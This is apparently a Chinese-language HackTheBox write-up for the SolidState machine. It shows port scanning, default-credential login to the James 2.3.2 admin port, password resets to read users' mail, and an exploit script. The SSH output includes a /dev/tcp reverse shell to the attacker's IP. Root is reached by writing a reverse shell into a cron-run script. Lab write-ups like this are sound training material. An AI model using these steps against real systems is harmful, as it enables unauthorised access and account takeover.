SolidState 测试过程

---

1 信息收集

NMAP

┌──(root㉿serven)-[~]
└─# nmap -p 0-65535 -A 10.129.224.177
Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-05 00:52 CST
Host is up (0.063s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3?
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
119/tcp  open  nntp?
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
4555/tcp open  rsip?
Device type: firewall
Running (JUST GUESSING): Fortinet embedded (90%)
OS CPE: cpe:/h:fortinet:fortigate_200b
Aggressive OS guesses: Fortinet FortiGate 200B firewall (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.29 ms 10.129.224.177

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8353.87 seconds

• 22 – SSH 服务
• 25 – SMTP 服务
• 80 – Apache 服务器
• 110 – pop3，使用该端口在SMTP服务器上发送和接收电子邮件。
• 119 – nntp（网络新闻传输协议），用于在新闻服务器之间传输 Usenet 新闻文章（netnews），以便最终用户客户端应用程序可以发布/阅读文章。
• 4555 – RSIP，用于列出SMTP服务器的用户并进行管理。

80 端口

  页面功能点多为静态页面，无可利用点

目录扫描

  扫描到的目录无可利用点

25、110、119、4555 端口

telnet 10.129.254.59 25

  发现James SMTP 2.3.2，搜索James 2.3.2 版本相关漏洞

james 2.3.2 漏洞利用

  脚本执行完成，输出显示需要在登录SSH情况下，才会监听到shell，但是现在没有账号密码进行SSH登录，所以下一步就是寻找是否存在可进行SSH连接的账号密码

python3 50347.py 10.129.254.59 10.10.14.25 4444

SSH 凭据测试

  4555 端口为James的管理端口，测试4555端口，使用默认账号密码 root：root 登录，默认凭据登录成功

  输出提示，使用HELP命令可以查看可运行命令

listusers 命令：输出 james、thomas、john、mindy、mailadmin 账户

setpassword 命令：可以更改用户密码，root权限下有权限更改其他用户的密码。

  使用端口 110 查看各个用户的电子邮件，john存在1封电子邮件，mindy存在两封

  在mindy的第二封电子邮件中，存在 mindy：P@55W0rd1!2@ 用于SSH访问

SSH凭据登录

(base) gryphon@wsdl HTB %ssh mindy@10.129.254.59
mindy@10.129.254.59's password: 
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jun  5 00:48:32 2024 from 10.10.14.25
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
         errorMessagetLjava/lang/String: No such file or directory
-rbash: L
         lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <32339690.0.1717559978216.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.25 ([10.10.14.25])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 1016
          for <../../../../../../../../etc/bash_completion.d@localhost>;
          Tue, 4 Jun 2024 23:58:47 -0400 (EDT)
Date: Tue, 4 Jun 2024 23:58:47 -0400 (EDT)
From: team@team.pl

: No such file or directory
-rbash: connect: Connection refused
-rbash: /dev/tcp/10.10.14.25/4444: Connection refused
-rbash: $'\r': command not found
mindy@solidstate:~$ 

  但是这个 SSH 访问受到限制，很多命令无法执行

  但是在之前利用James 2.3.2 RCE时，输出显示：在SSH登录时，就会转向一个shell，查看之前执行的监听，确实收到一个shell

---

2 权限提升

  使用 LinEnum.sh 进行信息收集

  在 /opt 目录下存在 tmp.py，以root身份每3分钟运行一次，将反向shell写入tmp.py，在三分钟后即可获得反向shell